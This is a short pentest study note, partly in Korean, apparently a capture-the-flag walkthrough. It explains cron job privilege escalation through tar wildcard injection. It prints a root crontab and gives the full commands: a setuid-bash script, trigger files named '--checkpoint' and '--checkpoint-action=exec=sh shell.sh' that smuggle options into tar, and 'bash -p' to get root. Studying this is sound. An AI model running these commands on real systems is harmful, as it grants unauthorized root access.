Cron jobs - wook413

- cron jobs are used to run scripts or binaries at specific times. - By default, they run with the privilege of their owners and not the current user. - If there’s a scheduled task that runs with root privileges and we can change the script that will be run, then our script will run with root privileges. - cron job configurations are stored as `crontabs` (cron tables) to see the next time and date the task will run. - if the full path of the script is not defined, cron will refer to the paths listed under the PATH variable in the /etc/crontab file. - If a file scheduled to be run has no "execute" permission set on the file, the file is not going to be run by the cron job even if it's listed under the crontab. # Wildcard Injection ```bash andre@cmess:~/backup$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) */2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz * ``` - crontab이 root로 실행됨. - `tar` 명령어가 `*`를 사용 -> 현재 디렉토리의 모든 파일을 인자로 전달. - `tar`의 특성상 쉘 실행 파일을 인자로 주입할 수 있음. ##### Exploit ```bash cd /home/andre/backup # 악성 파일 생성 echo 'chmod +s /bin/bash' > shell.sh chmod +x shell.sh # 트리거 파일 생성 touch "--checkpoint=1" touch "--checkpoint-action=exec=sh shell.sh" # 트리거 파일 생성 중 에러 나는 경우 # 옵션이 아니라 파일명이라는 것을 알려줘야함 touch -- '--checkpoint=1' touch -- '--checkpoint-action=exec=sh shell.sh' # 혹은 touch /home/andre/backup --checkpoint=1 touch /home/andre/backup --checkpoint-action=exec=sh\ shell.sh ``` - `--checkpoint=1`: 첫 번째 파일 처리 후마다 checkpoint를 발생시킴. - `--checkpoint-action=exec=sh shell.sh`: checkpoint가 발생할 때마다 `sh shell.sh` 실행 - 결과적으로 `tar`이 압축 진행 중에 `chmod +s /bin/bash`를 실행해서 **setuid bash**를 생성 ##### 쉘 획득 - 2분 후에 확인 `ls -l` - `-rwsr-xr-x 1 root root 1113504 Apr 10 14:58 /bin/bash - `/bin/bash -p`